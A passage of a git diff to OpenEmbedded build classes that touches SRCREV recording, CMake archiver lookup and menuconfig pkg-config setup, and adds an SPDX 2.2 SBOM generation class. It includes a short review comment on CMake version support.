with open(srcrevfile, 'w') as f:
- orig_srcrev = d.getVar('SRCREV', False) or 'INVALID'
- if orig_srcrev != 'INVALID':
- f.write('# SRCREV = "%s"\n' % orig_srcrev)
- if len(srcrevs) > 1:
- for name, srcrev in sorted(srcrevs.items()):
- orig_srcrev = d.getVar('SRCREV_%s' % name, False)
- if orig_srcrev:
- f.write('# SRCREV_%s = "%s"\n' % (name, orig_srcrev))
- f.write('SRCREV_%s = "%s"\n' % (name, srcrev))
- else:
- f.write('SRCREV = "%s"\n' % next(iter(srcrevs.values())))
- if len(tag_srcrevs) > 0:
- for name, srcrev in sorted(tag_srcrevs.items()):
- f.write('# tag_%s = "%s"\n' % (name, srcrev))
- if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev:
- pkg = d.getVar('PN')
- bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev))
+ for name, srcrev in sorted(srcrevs.items()):
+ suffix = "_" + name
+ if name == "default":
+ suffix = ""
+ orig_srcrev = d.getVar('SRCREV%s' % suffix, False)
+ if orig_srcrev:
+ f.write('# SRCREV%s = "%s"\n' % (suffix, orig_srcrev))
+ f.write('SRCREV%s = "%s"\n' % (suffix, srcrev))
+ for name, srcrev in sorted(tag_srcrevs.items()):
+ f.write('# tag_%s = "%s"\n' % (name, srcrev))
+ if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev:
+ pkg = d.getVar('PN')
+ bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev))
else:
if os.path.exists(srcrevfile):
diff --git a/meta/classes/cmake.bbclass b/meta/classes/cmake.bbclass
index 8243f7ce8c..af6a8c4395 100644
--- a/meta/classes/cmake.bbclass
+++ b/meta/classes/cmake.bbclass
@@ -102,7 +102,8 @@ set( CMAKE_CXX_COMPILER ${OECMAKE_CXX_COMPILER} )
set( CMAKE_C_COMPILER_LAUNCHER ${OECMAKE_C_COMPILER_LAUNCHER} )
set( CMAKE_CXX_COMPILER_LAUNCHER ${OECMAKE_CXX_COMPILER_LAUNCHER} )
set( CMAKE_ASM_COMPILER ${OECMAKE_C_COMPILER} )
-set( CMAKE_AR ${OECMAKE_AR} CACHE FILEPATH "Archiver" )
+find_program( CMAKE_AR ${OECMAKE_AR} DOC "Archiver" REQUIRED )
+
set( CMAKE_C_FLAGS "${OECMAKE_C_FLAGS}" CACHE STRING "CFLAGS" )
set( CMAKE_CXX_FLAGS "${OECMAKE_CXX_FLAGS}" CACHE STRING "CXXFLAGS" )
set( CMAKE_ASM_FLAGS "${OECMAKE_C_FLAGS}" CACHE STRING "ASM FLAGS" )
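Review bot: The `REQUIRED` keyword on the new `find_program( CMAKE_AR ... )` line is only honoured by CMake 3.18 and later; older releases do not treat it as a requirement, so a missing archiver would still go unnoticed there. Whether the cmake used with this branch is new enough is not visible in the hunk. If it may be older, an explicit check after the call keeps the intent: `if( NOT CMAKE_AR ) message( FATAL_ERROR "Archiver ${OECMAKE_AR} not found" ) endif()`. The surrounding block starts and ends outside the hunk.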
diff --git a/meta/classes/cml1.bbclass b/meta/classes/cml1.bbclass
index 8ab240589a..46a19fce32 100644
--- a/meta/classes/cml1.bbclass
+++ b/meta/classes/cml1.bbclass
@@ -36,6 +36,14 @@ python do_menuconfig() {
except OSError:
mtime = 0
+ # setup native pkg-config variables (kconfig scripts call pkg-config directly, cannot generically be overriden to pkg-config-native)
+ d.setVar("PKG_CONFIG_DIR", "${STAGING_DIR_NATIVE}${libdir_native}/pkgconfig")
+ d.setVar("PKG_CONFIG_PATH", "${PKG_CONFIG_DIR}:${STAGING_DATADIR_NATIVE}/pkgconfig")
+ d.setVar("PKG_CONFIG_LIBDIR", "${PKG_CONFIG_DIR}")
+ d.setVarFlag("PKG_CONFIG_SYSROOT_DIR", "unexport", "1")
+ # ensure that environment variables are overwritten with this tasks 'd' values
+ d.appendVar("OE_TERMINAL_EXPORTS", " PKG_CONFIG_DIR PKG_CONFIG_PATH PKG_CONFIG_LIBDIR PKG_CONFIG_SYSROOT_DIR")
+
oe_terminal("sh -c \"make %s; if [ \\$? -ne 0 ]; then echo 'Command failed.'; printf 'Press any key to continue... '; read r; fi\"" % d.getVar('KCONFIG_CONFIG_COMMAND'),
d.getVar('PN') + ' Configuration', d)
diff --git a/meta/classes/create-spdx-2.2.bbclass b/meta/classes/create-spdx-2.2.bbclass
new file mode 100644
index 0000000000..42b693d586
--- /dev/null
+++ b/meta/classes/create-spdx-2.2.bbclass
@@ -0,0 +1,1067 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+DEPLOY_DIR_SPDX ??= "${DEPLOY_DIR}/spdx/${MACHINE}"
+
+# The product name that the CVE database uses. Defaults to BPN, but may need to
+# be overriden per recipe (for example tiff.bb sets CVE_PRODUCT=libtiff).
+CVE_PRODUCT ??= "${BPN}"
+CVE_VERSION ??= "${PV}"
+
+SPDXDIR ??= "${WORKDIR}/spdx"
+SPDXDEPLOY = "${SPDXDIR}/deploy"
+SPDXWORK = "${SPDXDIR}/work"
+SPDXIMAGEWORK = "${SPDXDIR}/image-work"
+SPDXSDKWORK = "${SPDXDIR}/sdk-work"
+
+SPDX_TOOL_NAME ??= "oe-spdx-creator"
+SPDX_TOOL_VERSION ??= "1.0"
+
+SPDXRUNTIMEDEPLOY = "${SPDXDIR}/runtime-deploy"
+
+SPDX_INCLUDE_SOURCES ??= "0"
+SPDX_ARCHIVE_SOURCES ??= "0"
+SPDX_ARCHIVE_PACKAGED ??= "0"
+
+SPDX_UUID_NAMESPACE ??= "sbom.openembedded.org"
+SPDX_NAMESPACE_PREFIX ??= "http://spdx.org/spdxdoc"
+SPDX_PRETTY ??= "0"
+
+SPDX_LICENSES ??= "${COREBASE}/meta/files/spdx-licenses.json"
+
+SPDX_CUSTOM_ANNOTATION_VARS ??= ""
+
+SPDX_ORG ??= "OpenEmbedded ()"
+SPDX_SUPPLIER ??= "Organization: ${SPDX_ORG}"
+SPDX_SUPPLIER[doc] = "The SPDX PackageSupplier field for SPDX packages created from \
+ this recipe. For SPDX documents create using this class during the build, this \
+ is the contact information for the person or organization who is doing the \
+ build."
+
+def extract_licenses(filename):
+ import re
+
+ lic_regex = re.compile(rb'^\W*SPDX-License-Identifier:\s*([ \w\d.()+-]+?)(?:\s+\W*)?$', re.MULTILINE)
+
+ try:
+ with open(filename, 'rb') as f:
+ size = min(15000, os.stat(filename).st_size)
+ txt = f.read(size)
+ licenses = re.findall(lic_regex, txt)
+ if licenses:
+ ascii_licenses = [lic.decode('ascii') for lic in licenses]
+ return ascii_licenses
+ except Exception as e:
+ bb.warn(f"Exception reading {filename}: {e}")
+ return None
+
+def get_doc_namespace(d, doc):
+ import uuid
+ namespace_uuid = uuid.uuid5(uuid.NAMESPACE_DNS, d.getVar("SPDX_UUID_NAMESPACE"))
+ return "%s/%s-%s" % (d.getVar("SPDX_NAMESPACE_PREFIX"), doc.name, str(uuid.uuid5(namespace_uuid, doc.name)))
+
+def create_annotation(d, comment):
+ from datetime import datetime, timezone
+
+ creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
+ annotation = oe.spdx.SPDXAnnotation()
+ annotation.annotationDate = creation_time
+ annotation.annotationType = "OTHER"
+ annotation.annotator = "Tool: %s - %s" % (d.getVar("SPDX_TOOL_NAME"), d.getVar("SPDX_TOOL_VERSION"))
+ annotation.comment = comment
+ return annotation
+
+def recipe_spdx_is_native(d, recipe):
+ return any(a.annotationType == "OTHER" and
+ a.annotator == "Tool: %s - %s" % (d.getVar("SPDX_TOOL_NAME"), d.getVar("SPDX_TOOL_VERSION")) and
+ a.comment == "isNative" for a in recipe.annotations)
+
+def is_work_shared_spdx(d):
+ return bb.data.inherits_class('kernel', d) or ('work-shared' in d.getVar('WORKDIR'))
+
+def get_json_indent(d):
+ if d.getVar("SPDX_PRETTY") == "1":
+ return 2
+ return None
+
+python() {
+ import json
+ if d.getVar("SPDX_LICENSE_DATA"):
+ return
+
+ with open(d.getVar("SPDX_LICENSES"), "r") as f:
+ data = json.load(f)
+ # Transform the license array to a dictionary
+ data["licenses"] = {l["licenseId"]: l for l in data["licenses"]}
+ d.setVar("SPDX_LICENSE_DATA", data)
+}
+
+def convert_license_to_spdx(lic, document, d, existing={}):
+ from pathlib import Path
+ import oe.spdx
+
+ license_data = d.getVar("SPDX_LICENSE_DATA")
+ extracted = {}
+
+ def add_extracted_license(ident, name):
+ nonlocal document
+
+ if name in extracted:
+ return
+
+ extracted_info = oe.spdx.SPDXExtractedLicensingInfo()
+ extracted_info.name = name
+ extracted_info.licenseId = ident
+ extracted_info.extractedText = None
+
+ if name == "PD":
+ # Special-case this.
+ extracted_info.extractedText = "Software released to the public domain"
+ else:
+ # Seach for the license in COMMON_LICENSE_DIR and LICENSE_PATH
+ for directory in [d.getVar('COMMON_LICENSE_DIR')] + (d.getVar('LICENSE_PATH') or '').split():
+ try:
+ with (Path(directory) / name).open(errors="replace") as f:
+ extracted_info.extractedText = f.read()
+ break
+ except FileNotFoundError:
+ pass
+ if extracted_info.extractedText is None:
+ # If it's not SPDX or PD, then NO_GENERIC_LICENSE must be set
+ filename = d.getVarFlag('NO_GENERIC_LICENSE', name)
+ if filename:
+ filename = d.expand("${S}/" + filename)
+ with open(filename, errors="replace") as f:
+ extracted_info.extractedText = f.read()
+ else:
+ bb.error("Cannot find any text for license %s" % name)
+
+ extracted[name] = extracted_info
+ document.hasExtractedLicensingInfos.append(extracted_info)
+
+ def convert(l):
+ if l == "(" or l == ")":
+ return l
+
+ if l == "&":
+ return "AND"
+
+ if l == "|":
+ return "OR"
+
+ if l == "CLOSED":
+ return "NONE"
+
+ spdx_license = d.getVarFlag("SPDXLICENSEMAP", l) or l
+ if spdx_license in license_data["licenses"]:
+ return spdx_license
+
+ try:
+ spdx_license = existing[l]
+ except KeyError:
+ spdx_license = "LicenseRef-" + l
+ add_extracted_license(spdx_license, l)
+
+ return spdx_license
+
+ lic_split = lic.replace("(", " ( ").replace(")", " ) ").split()
+
+ return ' '.join(convert(l) for l in lic_split)
+
+def process_sources(d):
+ pn = d.getVar('PN')
+ assume_provided = (d.getVar("ASSUME_PROVIDED") or "").split()
+ if pn in assume_provided:
+ for p in d.getVar("PROVIDES").split():
+ if p != pn:
+ pn = p
+ break
+
+ # glibc-locale: do_fetch, do_unpack and do_patch tasks have been deleted,
+ # so avoid archiving source here.
+ if pn.startswith('glibc-locale'):
+ return False
+ if d.getVar('PN') == "libtool-cross":
+ return False
+ if d.getVar('PN') == "libgcc-initial":
+ return False
+ if d.getVar('PN') == "shadow-sysroot":
+ return False
+
+ # We just archive gcc-source for all the gcc related recipes
+ if d.getVar('BPN') in ['gcc', 'libgcc']:
+ bb.debug(1, 'spdx: There is bug in scan of %s is, do nothing' % pn)
+ return False
+
+ return True
+
+
+def add_package_files(d, doc, spdx_pkg, topdir, get_spdxid, get_types, *, archive=None, ignore_dirs=[], ignore_top_level_dirs=[]):
+ from pathlib import Path
+ import oe.spdx
+ import hashlib
+
+ source_date_epoch = d.getVar("SOURCE_DATE_EPOCH")
+ if source_date_epoch:
+ source_date_epoch = int(source_date_epoch)
+
+ sha1s = []
+ spdx_files = []
+
+ file_counter = 1
+ for subdir, dirs, files in os.walk(topdir):
+ dirs[:] = [d for d in dirs if d not in ignore_dirs]
+ if subdir == str(topdir):
+ dirs[:] = [d for d in dirs if d not in ignore_top_level_dirs]
+
+ for file in files:
+ filepath = Path(subdir) / file
+ filename = str(filepath.relative_to(topdir))
+
+ if not filepath.is_symlink() and filepath.is_file():
+ spdx_file = oe.spdx.SPDXFile()
+ spdx_file.SPDXID = get_spdxid(file_counter)
+ for t in get_types(filepath):
+ spdx_file.fileTypes.append(t)
+ spdx_file.fileName = filename
+
+ if archive is not None:
+ with filepath.open("rb") as f:
+ info = archive.gettarinfo(fileobj=f)
+ info.name = filename
+ info.uid = 0
+ info.gid = 0
+ info.uname = "root"
+ info.gname = "root"
+
+ if source_date_epoch is not None and info.mtime > source_date_epoch:
+ info.mtime = source_date_epoch
+
+ archive.addfile(info, f)
+
+ sha1 = bb.utils.sha1_file(filepath)
+ sha1s.append(sha1)
+ spdx_file.checksums.append(oe.spdx.SPDXChecksum(
+ algorithm="SHA1",
+ checksumValue=sha1,
+ ))
+ spdx_file.checksums.append(oe.spdx.SPDXChecksum(
+ algorithm="SHA256",
+ checksumValue=bb.utils.sha256_file(filepath),
+ ))
+
+ if "SOURCE" in spdx_file.fileTypes:
+ extracted_lics = extract_licenses(filepath)
+ if extracted_lics:
+ spdx_file.licenseInfoInFiles = extracted_lics
+
+ doc.files.append(spdx_file)
+ doc.add_relationship(spdx_pkg, "CONTAINS", spdx_file)
+ spdx_pkg.hasFiles.append(spdx_file.SPDXID)
+
+ spdx_files.append(spdx_file)
+
+ file_counter += 1
+
+ sha1s.sort()
+ verifier = hashlib.sha1()
+ for v in sha1s:
+ verifier.update(v.encode("utf-8"))
+ spdx_pkg.packageVerificationCode.packageVerificationCodeValue = verifier.hexdigest()
+
+ return spdx_files
+
+
+def add_package_sources_from_debug(d, package_doc, spdx_package, package, package_files, sources):
+ from pathlib import Path
+ import hashlib
+ import oe.packagedata
+ import oe.spdx
+
+ debug_search_paths = [
+ Path(d.getVar('PKGD')),
+ Path(d.getVar('STAGING_DIR_TARGET')),
+ Path(d.getVar('STAGING_DIR_NATIVE')),
+ Path(d.getVar('STAGING_KERNEL_DIR')),
+ ]
+
+ pkg_data = oe.packagedata.read_subpkgdata_extended(package, d)
+
+ if pkg_data is None:
+ return
+
+ for file_path, file_data in pkg_data["files_info"].items():
+ if not "debugsrc" in file_data:
+ continue
+
+ for pkg_file in package_files:
+ if file_path.lstrip("/") == pkg_file.fileName.lstrip("/"):
+ break
+ else:
+ bb.fatal("No package file found for %s" % str(file_path))
+ continue
+
+ for debugsrc in file_data["debugsrc"]:
+ ref_id = "NOASSERTION"
+ for search in debug_search_paths:
+ if debugsrc.startswith("/usr/src/kernel"):
+ debugsrc_path = search / debugsrc.replace('/usr/src/kernel/', '')
+ else:
+ debugsrc_path = search / debugsrc.lstrip("/")
+ if not debugsrc_path.exists():
+ continue
+
+ file_sha256 = bb.utils.sha256_file(debugsrc_path)
+
+ if file_sha256 in sources:
+ source_file = sources[file_sha256]
+
+ doc_ref = package_doc.find_external_document_ref(source_file.doc.documentNamespace)
+ if doc_ref is None:
+ doc_ref = oe.spdx.SPDXExternalDocumentRef()
+ doc_ref.externalDocumentId = "DocumentRef-dependency-" + source_file.doc.name
+ doc_ref.spdxDocument = source_file.doc.documentNamespace
+ doc_ref.checksum.algorithm = "SHA1"
+ doc_ref.checksum.checksumValue = source_file.doc_sha1
+ package_doc.externalDocumentRefs.append(doc_ref)
+
+ ref_id = "%s:%s" % (doc_ref.externalDocumentId, source_file.file.SPDXID)
+ else:
+ bb.debug(1, "Debug source %s with SHA256 %s not found in any dependency" % (str(debugsrc_path), file_sha256))
+ break
+ else:
+ bb.debug(1, "Debug source %s not found" % debugsrc)
+
+ package_doc.add_relationship(pkg_file, "GENERATED_FROM", ref_id, comment=debugsrc)
+
+def collect_dep_recipes(d, doc, spdx_recipe):
+ from pathlib import Path
+ import oe.sbom
+ import oe.spdx
+
+ deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+
+ dep_recipes = []
+ taskdepdata = d.getVar("BB_TASKDEPDATA", False)
+ deps = sorted(set(
+ dep[0] for dep in taskdepdata.values() if
+ dep[1] == "do_create_spdx" and dep[0] != d.getVar("PN")
+ ))
+ for dep_pn in deps:
+ dep_recipe_path = deploy_dir_spdx / "recipes" / ("recipe-%s.spdx.json" % dep_pn)
+
+ spdx_dep_doc, spdx_dep_sha1 = oe.sbom.read_doc(dep_recipe_path)
+
+ for pkg in spdx_dep_doc.packages:
+ if pkg.name == dep_pn:
+ spdx_dep_recipe = pkg
+ break
+ else:
+ continue
+
+ dep_recipes.append(oe.sbom.DepRecipe(spdx_dep_doc, spdx_dep_sha1, spdx_dep_recipe))
+
+ dep_recipe_ref = oe.spdx.SPDXExternalDocumentRef()
+ dep_recipe_ref.externalDocumentId = "DocumentRef-dependency-" + spdx_dep_doc.name
+ dep_recipe_ref.spdxDocument = spdx_dep_doc.documentNamespace
+ dep_recipe_ref.checksum.algorithm = "SHA1"
+ dep_recipe_ref.checksum.checksumValue = spdx_dep_sha1
+
+ doc.externalDocumentRefs.append(dep_recipe_ref)
+
+ doc.add_relationship(
+ "%s:%s" % (dep_recipe_ref.externalDocumentId, spdx_dep_recipe.SPDXID),
+ "BUILD_DEPENDENCY_OF",
+ spdx_recipe
+ )
+
+ return dep_recipes
+
+collect_dep_recipes[vardepsexclude] += "BB_TASKDEPDATA"
+collect_dep_recipes[vardeps] += "DEPENDS"
+
+def collect_dep_sources(d, dep_recipes):
+ import oe.sbom
+
+ sources = {}
+ for dep in dep_recipes:
+ # Don't collect sources from native recipes as they
+ # match non-native sources also.
+ if recipe_spdx_is_native(d, dep.recipe):
+ continue
+ recipe_files = set(dep.recipe.hasFiles)
+
+ for spdx_file in dep.doc.files:
+ if spdx_file.SPDXID not in recipe_files:
+ continue
+
+ if "SOURCE" in spdx_file.fileTypes:
+ for checksum in spdx_file.checksums:
+ if checksum.algorithm == "SHA256":
+ sources[checksum.checksumValue] = oe.sbom.DepSource(dep.doc, dep.doc_sha1, dep.recipe, spdx_file)
+ break
+
+ return sources
+
+def add_download_packages(d, doc, recipe):
+ import os.path
+ from bb.fetch2 import decodeurl, CHECKSUM_LIST
+ import bb.process
+ import oe.spdx
+ import oe.sbom
+
+ for download_idx, src_uri in enumerate(d.getVar('SRC_URI').split()):
+ f = bb.fetch2.FetchData(src_uri, d)
+
+ for name in f.names:
+ package = oe.spdx.SPDXPackage()
+ package.name = "%s-source-%d" % (d.getVar("PN"), download_idx + 1)
+ package.SPDXID = oe.sbom.get_download_spdxid(d, download_idx + 1)
+
+ if f.type == "file":
+ continue
+
+ uri = f.type
+ proto = getattr(f, "proto", None)
+ if proto is not None:
+ uri = uri + "+" + proto
+ uri = uri + "://" + f.host + f.path
+
+ if f.method.supports_srcrev():
+ uri = uri + "@" + f.revisions[name]
+
+ if f.method.supports_checksum(f):
+ for checksum_id in CHECKSUM_LIST:
+ if checksum_id.upper() not in oe.spdx.SPDXPackage.ALLOWED_CHECKSUMS:
+ continue
+
+ expected_checksum = getattr(f, "%s_expected" % checksum_id)
+ if expected_checksum is None:
+ continue
+
+ c = oe.spdx.SPDXChecksum()
+ c.algorithm = checksum_id.upper()
+ c.checksumValue = expected_checksum
+ package.checksums.append(c)
+
+ package.downloadLocation = uri
+ doc.packages.append(package)
+ doc.add_relationship(doc, "DESCRIBES", package)
+ # In the future, we might be able to do more fancy dependencies,
+ # but this should be sufficient for now
+ doc.add_relationship(package, "BUILD_DEPENDENCY_OF", recipe)
+
+python do_create_spdx() {
+ from datetime import datetime, timezone
+ import oe.sbom
+ import oe.spdx
+ import uuid
+ from pathlib import Path
+ from contextlib import contextmanager
+ import oe.cve_check
+
+ @contextmanager
+ def optional_tarfile(name, guard, mode="w"):
+ import tarfile
+ import gzip
+
+ if guard:
+ name.parent.mkdir(parents=True, exist_ok=True)
+ with gzip.open(name, mode=mode + "b") as f:
+ with tarfile.open(fileobj=f, mode=mode + "|") as tf:
+ yield tf
+ else:
+ yield None
+
+
+ deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+ spdx_workdir = Path(d.getVar("SPDXWORK"))
+ include_sources = d.getVar("SPDX_INCLUDE_SOURCES") == "1"
+ archive_sources = d.getVar("SPDX_ARCHIVE_SOURCES") == "1"
+ archive_packaged = d.getVar("SPDX_ARCHIVE_PACKAGED") == "1"
+
+ creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
+
+ doc = oe.spdx.SPDXDocument()
+
+ doc.name = "recipe-" + d.getVar("PN")
+ doc.documentNamespace = get_doc_namespace(d, doc)
+ doc.creationInfo.created = creation_time
+ doc.creationInfo.comment = "This document was created by analyzing recipe files during the build."
+ doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
+ doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
+ doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
+ doc.creationInfo.creators.append("Person: N/A ()")
+
+ recipe = oe.spdx.SPDXPackage()
+ recipe.name = d.getVar("PN")
+ recipe.versionInfo = d.getVar("PV")
+ recipe.SPDXID = oe.sbom.get_recipe_spdxid(d)
+ recipe.supplier = d.getVar("SPDX_SUPPLIER")
+ if bb.data.inherits_class("native", d) or bb.data.inherits_class("cross", d):
+ recipe.annotations.append(create_annotation(d, "isNative"))
+
+ homepage = d.getVar("HOMEPAGE")
+ if homepage:
+ recipe.homepage = homepage
+
+ license = d.getVar("LICENSE")
+ if license:
+ recipe.licenseDeclared = convert_license_to_spdx(license, doc, d)
+
+ summary = d.getVar("SUMMARY")
+ if summary:
+ recipe.summary = summary
+
+ description = d.getVar("DESCRIPTION")
+ if description:
+ recipe.description = description
+
+ if d.getVar("SPDX_CUSTOM_ANNOTATION_VARS"):
+ for var in d.getVar('SPDX_CUSTOM_ANNOTATION_VARS').split():
+ recipe.annotations.append(create_annotation(d, var + "=" + d.getVar(var)))
+
+ # Some CVEs may be patched during the build process without incrementing the version number,
+ # so querying for CVEs based on the CPE id can lead to false positives. To account for this,
+ # save the CVEs fixed by patches to source information field in the SPDX.
+ patched_cves = oe.cve_check.get_patched_cves(d)
+ patched_cves = list(patched_cves)
+ patched_cves = ' '.join(patched_cves)
+ if patched_cves:
+ recipe.sourceInfo = "CVEs fixed: " + patched_cves
+
+ cpe_ids = oe.cve_check.get_cpe_ids(d.getVar("CVE_PRODUCT"), d.getVar("CVE_VERSION"))
+ if cpe_ids:
+ for cpe_id in cpe_ids:
+ cpe = oe.spdx.SPDXExternalReference()
+ cpe.referenceCategory = "SECURITY"
+ cpe.referenceType = "http://spdx.org/rdf/references/cpe23Type"
+ cpe.referenceLocator = cpe_id
+ recipe.externalRefs.append(cpe)
+
+ doc.packages.append(recipe)
+ doc.add_relationship(doc, "DESCRIBES", recipe)
+
+ add_download_packages(d, doc, recipe)
+
+ if process_sources(d) and include_sources:
+ recipe_archive = deploy_dir_spdx / "recipes" / (doc.name + ".tar.gz")
+ with optional_tarfile(recipe_archive, archive_sources) as archive:
+ spdx_get_src(d)
+
+ add_package_files(
+ d,
+ doc,
+ recipe,
+ spdx_workdir,
+ lambda file_counter: "SPDXRef-SourceFile-%s-%d" % (d.getVar("PN"), file_counter),
+ lambda filepath: ["SOURCE"],
+ ignore_dirs=[".git"],
+ ignore_top_level_dirs=["temp"],
+ archive=archive,
+ )
+
+ if archive is not None:
+ recipe.packageFileName = str(recipe_archive.name)
+
+ dep_recipes = collect_dep_recipes(d, doc, recipe)
+
+ doc_sha1 = oe.sbom.write_doc(d, doc, "recipes", indent=get_json_indent(d))
+ dep_recipes.append(oe.sbom.DepRecipe(doc, doc_sha1, recipe))
+
+ recipe_ref = oe.spdx.SPDXExternalDocumentRef()
+ recipe_ref.externalDocumentId = "DocumentRef-recipe-" + recipe.name
+ recipe_ref.spdxDocument = doc.documentNamespace
+ recipe_ref.checksum.algorithm = "SHA1"
+ recipe_ref.checksum.checksumValue = doc_sha1
+
+ sources = collect_dep_sources(d, dep_recipes)
+ found_licenses = {license.name:recipe_ref.externalDocumentId + ":" + license.licenseId for license in doc.hasExtractedLicensingInfos}
+
+ if not recipe_spdx_is_native(d, recipe):
+ bb.build.exec_func("read_subpackage_metadata", d)
+
+ pkgdest = Path(d.getVar("PKGDEST"))
+ for package in d.getVar("PACKAGES").split():
+ if not oe.packagedata.packaged(package, d):
+ continue
+
+ package_doc = oe.spdx.SPDXDocument()
+ pkg_name = d.getVar("PKG:%s" % package) or package
+ package_doc.name = pkg_name
+ package_doc.documentNamespace = get_doc_namespace(d, package_doc)
+ package_doc.creationInfo.created = creation_time
+ package_doc.creationInfo.comment = "This document was created by analyzing packages created during the build."
+ package_doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
+ package_doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
+ package_doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
+ package_doc.creationInfo.creators.append("Person: N/A ()")
+ package_doc.externalDocumentRefs.append(recipe_ref)
+
+ package_license = d.getVar("LICENSE:%s" % package) or d.getVar("LICENSE")
+
+ spdx_package = oe.spdx.SPDXPackage()
+
+ spdx_package.SPDXID = oe.sbom.get_package_spdxid(pkg_name)
+ spdx_package.name = pkg_name
+ spdx_package.versionInfo = d.getVar("PV")
+ spdx_package.licenseDeclared = convert_license_to_spdx(package_license, package_doc, d, found_licenses)
+ spdx_package.supplier = d.getVar("SPDX_SUPPLIER")
+
+ package_doc.packages.append(spdx_package)
+
+ package_doc.add_relationship(spdx_package, "GENERATED_FROM", "%s:%s" % (recipe_ref.externalDocumentId, recipe.SPDXID))
+ package_doc.add_relationship(package_doc, "DESCRIBES", spdx_package)
+
+ package_archive = deploy_dir_spdx / "packages" / (package_doc.name + ".tar.gz")
+ with optional_tarfile(package_archive, archive_packaged) as archive:
+ package_files = add_package_files(
+ d,
+ package_doc,
+ spdx_package,
+ pkgdest / package,
+ lambda file_counter: oe.sbom.get_packaged_file_spdxid(pkg_name, file_counter),
+ lambda filepath: ["BINARY"],
+ ignore_top_level_dirs=['CONTROL', 'DEBIAN'],
+ archive=archive,
+ )
+
+ if archive is not None:
+ spdx_package.packageFileName = str(package_archive.name)
+
+ add_package_sources_from_debug(d, package_doc, spdx_package, package, package_files, sources)
+
+ oe.sbom.write_doc(d, package_doc, "packages", indent=get_json_indent(d))
+}
+# NOTE: depending on do_unpack is a hack that is necessary to get it's dependencies for archive the source
+addtask do_create_spdx after do_package do_packagedata do_unpack before do_populate_sdk do_build do_rm_work
+
+SSTATETASKS += "do_create_spdx"
+do_create_spdx[sstate-inputdirs] = "${SPDXDEPLOY}"
+do_create_spdx[sstate-outputdirs] = "${DEPLOY_DIR_SPDX}"
+
+python do_create_spdx_setscene () {
+ sstate_setscene(d)
+}
+addtask do_create_spdx_setscene
+
+do_create_spdx[dirs] = "${SPDXWORK}"
+do_create_spdx[cleandirs] = "${SPDXDEPLOY} ${SPDXWORK}"
+do_create_spdx[depends] += "${PATCHDEPENDENCY}"
+do_create_spdx[deptask] = "do_create_spdx"
+
+def collect_package_providers(d):
+ from pathlib import Path
+ import oe.sbom
+ import oe.spdx
+ import json
+
+ deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+
+ providers = {}
+
+ taskdepdata = d.getVar("BB_TASKDEPDATA", False)
+ deps = sorted(set(
+ dep[0] for dep in taskdepdata.values() if dep[0] != d.getVar("PN")
+ ))
+ deps.append(d.getVar("PN"))
+
+ for dep_pn in deps:
+ recipe_data = oe.packagedata.read_pkgdata(dep_pn, d)
+
+ for pkg in recipe_data.get("PACKAGES", "").split():
+
+ pkg_data = oe.packagedata.read_subpkgdata_dict(pkg, d)
+ rprovides = set(n for n, _ in bb.utils.explode_dep_versions2(pkg_data.get("RPROVIDES", "")).items())
+ rprovides.add(pkg)
+
+ for r in rprovides:
+ providers[r] = pkg
+
+ return providers
+
+collect_package_providers[vardepsexclude] += "BB_TASKDEPDATA"
+
+python do_create_runtime_spdx() {
+ from datetime import datetime, timezone
+ import oe.sbom
+ import oe.spdx
+ import oe.packagedata
+ from pathlib import Path
+
+ deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+ spdx_deploy = Path(d.getVar("SPDXRUNTIMEDEPLOY"))
+ is_native = bb.data.inherits_class("native", d) or bb.data.inherits_class("cross", d)
+
+ creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
+
+ providers = collect_package_providers(d)
+
+ if not is_native:
+ bb.build.exec_func("read_subpackage_metadata", d)
+
+ dep_package_cache = {}
+
+ pkgdest = Path(d.getVar("PKGDEST"))
+ for package in d.getVar("PACKAGES").split():
+ localdata = bb.data.createCopy(d)
+ pkg_name = d.getVar("PKG:%s" % package) or package
+ localdata.setVar("PKG", pkg_name)
+ localdata.setVar('OVERRIDES', d.getVar("OVERRIDES", False) + ":" + package)
+
+ if not oe.packagedata.packaged(package, localdata):
+ continue
+
+ pkg_spdx_path = deploy_dir_spdx / "packages" / (pkg_name + ".spdx.json")
+
+ package_doc, package_doc_sha1 = oe.sbom.read_doc(pkg_spdx_path)
+
+ for p in package_doc.packages:
+ if p.name == pkg_name:
+ spdx_package = p
+ break
+ else:
+ bb.fatal("Package '%s' not found in %s" % (pkg_name, pkg_spdx_path))
+
+ runtime_doc = oe.spdx.SPDXDocument()
+ runtime_doc.name = "runtime-" + pkg_name
+ runtime_doc.documentNamespace = get_doc_namespace(localdata, runtime_doc)
+ runtime_doc.creationInfo.created = creation_time
+ runtime_doc.creationInfo.comment = "This document was created by analyzing package runtime dependencies."
+ runtime_doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
+ runtime_doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
+ runtime_doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
+ runtime_doc.creationInfo.creators.append("Person: N/A ()")
+
+ package_ref = oe.spdx.SPDXExternalDocumentRef()
+ package_ref.externalDocumentId = "DocumentRef-package-" + package
+ package_ref.spdxDocument = package_doc.documentNamespace
